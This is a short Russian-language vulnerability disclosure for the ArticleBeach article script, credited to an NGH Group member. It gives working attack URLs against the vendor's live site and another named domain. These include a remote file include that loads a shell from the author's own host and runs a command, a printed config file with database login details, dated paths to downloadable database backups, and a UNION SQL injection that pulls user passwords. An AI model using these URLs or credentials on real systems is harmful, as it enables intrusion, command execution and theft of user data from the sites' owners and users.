Software: все версии
Vendor: ArticleBeach
www.articlebeach.com

Vulnerability: выполнение произвольных команд, просмотр пароля доступа к базе
данных, доступ к бекапам базы данных, sql-инъекция.
discovered by durito [NGH Group] -durito[at]mail[dot]ru-
durito.narod.ru
ngh.void.ru

Выполнение произвольных команд

Параметр page скрипта index.php инкдудит внешние файлы без всякой проверки.

http://www.xxx.com/index.php?page=http://ataker_site/

Пример:

http://www.articlebeach.com/index.php?page= http://durito.narod.ru/sh&cmd=ls%20-lpa

Просмотр пароля доступа к базе данных

Любой сторонний пользователь может получить конфигурационный файл содержащий
реквизиты доступа к базе данных из папки /includes/

http://www.xxx.com/includes/config.inc

Пример:

http://www.articlebeach.com/includes/config.inc

Содержимое файла config.inc

<?
global $_cn;
global $dbserver;
global $db;
global $dbuser;
global $dbpass;

//mysql database server, login,password & Database name
$dbserver ="localhost";
$database_connect="article_art";
$dbuser ="article_jer";
$dbpass ="aaaaa";

$connect = mysql_connect($dbserver, $dbuser, $dbpass)
or die("Couldn’t connect to MySQL");
mysql_select_db($database_connect, $connect);

?>

Доступ к бекапам базы данных

Бекапы базы данных находятся в директории /backup/ и доступны для просмотра
удаленному пользователю, имя файла состоит из названия базы (article_art) и даты
бекапа 22/12/2005 (22122005) и может быть легко предугадано злоумышленником.

Пример:

http://www.articlebeach.com/backup/article_art_22122005.sql
http://25000articles.com/backup/mydisk_25000a_13122005.sql

Sql-инъекция

Параметр category_id не осуществляет фильтрацию, что приводит к возможности
выполнения Sql-инъекции.

Экплойт:

http://www.xxx.com/index.php?pg=3&page=category&category_id=[SQL]

Пример:

http://www.articlebeach.com/index.php?pg=3&page=category&category_id=
22+union+select+1,2,3,4,5,6,7,password+from+user_master/*
 



Оставить мнение